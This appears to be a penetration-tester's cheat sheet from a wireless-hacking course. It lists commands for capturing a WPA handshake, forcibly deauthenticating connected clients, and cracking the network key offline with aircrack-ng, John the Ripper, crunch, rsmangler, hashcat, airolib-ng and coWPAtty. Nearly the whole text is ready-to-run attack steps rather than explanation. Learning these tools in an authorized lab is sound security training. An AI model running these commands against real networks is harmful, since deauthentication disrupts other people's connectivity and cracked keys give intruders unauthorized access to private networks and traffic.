Cracking Authentication Hashes

# Airodump-ng command and output on channel 3, focused on a BSSID to capture 4-way handshake
sudo airodump-ng -c 3 -w wpa --essid wifu --bssid 34:08:04:09:3D:38 wlan0mon
# Deauthenticating associated client
sudo aireplay-ng -0 1 -a 34:08:04:09:3D:38 -c 00:18:4D:1D:A8:1F wlan0mon
sudo aireplay-ng -0 1 -a 34:08:04:09:3D:38 wlan0mon
# Performing offline 4-way handshake cracking
aircrack-ng -w /usr/share/john/password.lst -e wifu -b 34:08:04:09:3D:38 wpa-01.cap
# To confirm the key is correct let's decrypt the traffic with airdecap-ng or wireshark
airdecap-ng -b 34:08:04:09:3D:38 -e wifu -p 12345678 wpa-01.cap

Custom Wordlists

=> John the Ripper
# John mangling rules
sudo nano /etc/john/john.conf
# Creat a custom wordlist
john --wordlist=/usr/share/john/password.lst --rules --stdout | grep -i Password123
# Combining JtR mangling rules and piping it to aircrack-ng
john --wordlist=/usr/share/john/password.lst --rules --stdout | aircrack-ng -e wifu -w - ~/wpa-01.cap

=> Crunch
@ : represents lowercase characters or characters from a defined set
, : represents uppercase characters
% : represent numbers
^ : represents symbols
# Using Crunch to generate wordlist starting with 'password' and ending with 3 digits 
crunch 11 11 0123456789 -t password@@@
# Using Crunch to generate wordlist using characters in 'abcde12345' without repeating any of them
crunch 1 1 -p abcde12345
# Using Crunch to generate wordlist with multiple words instead of characters, without repeating them
crunch 1 1 -p dog cat bird
# Using Crunch to generate a non-repeating wordlist from multiple words and adding two characters from a defined character set
crunch 5 5 aADE -t ddd@@ -p dog cat bird
# Combining Crunch mangling and piping it to aircrack-ng
crunch 11 11 -t password%%% | aircrack-ng -e wifu crunch-01.cap -w -

=> RSMangler
echo bird > wordlist.txt ; echo cat > wordlist.txt ; echo dog > wordlist.txt
rsmangler --file wordlist.txt --min 12 --max 13 --allow-duplicates | aircrack-ng -e wifu rsmangler-01.cap -w -

=> aircrack-ng.org/doku.php?id=faq#where_can_i_find_good_wordlists
=> standards-oui.ieee.org/oui/oui.txt
=> wireshark.org/tools/oui-lookup.html

Hashcat

# Installing hashcat utilities
sudo apt install hashcat-utils
# Converting PCAP to hccapx for hashcat
/usr/lib/hashcat-utils/cap2hccapx.bin wifu-01.cap output.hccapx
# Cracking with hashcat
hashcat -m 2500 --deprecated-check-disable output.hccapx /usr/share/john/password.lst
# To use the 22000 mode we need to convert WPA/WPA2 pcap or install hcxtools
=> https://hashcat.net/cap2hashcat/
sudo apt install hcxtools
hcxpcapngtool -o hash.hc22000  wifu-01.cap
hashcat -a 0 -m  22000  hash.hc22000 /usr/share/john/password.lst

Airolib-ng

# This methode is very fast to offine crack WPA/WPA 2 Passwords
# Adding the target ESSID to a file
echo wifu > essid.txt
# Importing the ESSID with airolib-ng
airolib-ng wifu.sqlite --import essid essid.txt
# Viewing the airolib-ng database statistics
airolib-ng wifu.sqlite --stats
# Importing passwords into the airolib-ng database
airolib-ng wifu.sqlite --import passwd /usr/share/john/password.lst
# Generating the PMKs for the ESSID
airolib-ng wifu.sqlite --batch
# Recovering the WPA password with the airolib-ng database
aircrack-ng -r wifu.sqlite wpa1-01.cap

coWPAtty

=> Rainbow Table Mode
# Creating pre-computed hash tables using genpmk
sudo apt install cowpatty
genpmk -f /usr/share/john/password.lst -d wifuhashes -s wifu
# Using pre-computed hashtables with coWPAtty
cowpatty -r wpajohn-01.cap -d wifuhashes -s wifu